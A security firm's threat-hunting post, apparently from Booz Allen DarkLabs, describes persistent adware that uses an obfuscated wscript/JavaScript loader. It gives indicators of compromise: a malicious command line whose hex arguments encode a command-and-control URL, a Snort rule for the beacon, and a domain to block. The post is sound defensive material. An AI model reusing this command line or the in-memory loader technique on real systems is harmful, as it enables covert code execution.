Detecting A New Advanced Persistent Threat: Adware

In late 2017, we discovered a new type of advanced persistent threat: sophisticated adware that utilizes advanced techniques for persistence and antivirus evasion. Here’s how to fight advanced persistent adware (APA) in your networks.

How Advanced Persistent Adware Works

The payload and persistence of the new APA variant is relatively lightweight. It functions through an obfuscated JavaScript downloader that captures an additional script, decrypts it, and then runs the newly downloaded script in memory. The simplicity of the persisted loader and persistence mecha­nism itself (running as a scheduled task) points to a sophisticated level of operational security.

The developer of this adware uses what is known as a “burnable loader” which can be changed rapidly and thrown away if detected by antivirus. The loading of the second-stage malware in memory also points to a level of operational security generally used by APT-level actors.

We classify this malware as adware because its main purpose is to display ads to a user via redirection or by opening a new browser tab. But the first-stage loader could be used to execute any arbitrary code so while its current use case is a relatively minor threat, APA poses an increased security risk because it could easily be repur­posed for an additional targeted attack.

How We Discovered the New Malware Variant 

The Booz Allen DarkLabs Threat Hunt team discovered the malware during an advanced persistent threat hunt which was analyzing the use of wscript.exe on Windows targets. DarkLabs analysts use a hypothesis-based approach to threat hunting. The team began with a theory: “some attackers use the legitimate program, wscript.exe, to launch their malware.” They then utilized the DarkLabs Threat Hunting platform to collect data that would prove or disprove the hypothesis.

In this case, the hunt focused on command line usage of wscript.exe taken from Endpoint Detection and Response (EDR) tools on the network. This data was placed in a “haystack” (a collection of organized and sorted data) and analyzed to find suspicious activity. The suspicious activity observed by a Booz Allen analyst for the APA was the use of wscript.exe with multiple command line arguments which where base64 (b64) encoded American Standard Code for Information Interchange (ASCII) and binary strings. The team then retrieved the malicious JavaScript file and reverse-engi­neered it to identify its persistence mech­anism and additional functionality.

The second-stage download target Uniform Resource Locator (URL) was extracted and used to search across other networks to gain an understanding of how wide­spread the campaign had become. In doing so, this allowed the DarkLabs team to go from a proactive hunt, to an identi­fied intrusion, and finally, to signa­ture-based detection so that this type of threat can be easily identified in the future.

How to Detect & Remove the APA Variant

This variant of APA can be identified using the following IOCs:

Snort rule to command-and-control (C2) beacon:

alert tcp any any -> any 80(msg:”Suspicious Post”; pcre:”/pcrc=[0-9]{10}&rv=\d/”; content:”POST”; http_method; sid: 100000; rev:1;)

An example of command line execution for this adware is as follows:

C:\WINDOWS\SYSTEM32\wscript.exe “C:\ProgramData{73FDB69E-F9BF-3C58-7F79-A21AE53B29D4}\foto.txt” “687474703a2f2f7761676e672e636f6d” “433a5c50726f6772616d446174615c7b37334644423639452d463942462d334335382d374
637392d4132314145353342323944347d5c73696365736f” “433a5c50726f6772616d4461
74615c7b373346444236394” “//B” “//E:jscript” “--IsErIk”

If found on a network, it can safely be removed by performing the steps listed below:

1. Remove the scheduled task which kicks off wscript.exe
2. Remove the persisted JavaScript file from disk

To proactively identify APA in general, the DarkLabs ATH team recommends the following steps:

1. Be cautious of software downloads and installations from third parties.
2. Establish a routine check for known persistence mechanisms on all endpoints.
3. Utilize EDR tools effectively to collect both alert data for known Indicators of Compromise (IOCs) as well as telemetry/forensic data to proactively hunt for unknown malicious behavior.
4. Implement blocks for the domain wagng[.]com

Given the information listed above, the DarkLabs team places this APA at a moderate risk. That being said, it is important to note that this serves as an example of the type of advanced techniques being newly used by a particular class of threat, which essentially points to the increased proliferation of these methods and the need for advanced defense capabilities.

Our Proactive Hunt Approach Gives You the Advantage

The proactive threat hunting performed by the DarkLabs ATH team shifts the current imbalance in the arms race between attacker and defender. Traditionally, an attacker can defeat most antivirus solutions by quickly changing the file that is persisted on disk for any given target. But a defender using the ATH team method­ology and tools will have an advantage: the malware execution will show up in the wscript hunt haystack as suspicious or malicious. The proactive hunt approach forces the attacker to make large and costly changes to their malware if they want to continue the campaign and if they don’t make those changes, the defender can quickly identify and respond to the malware with little loss in productivity.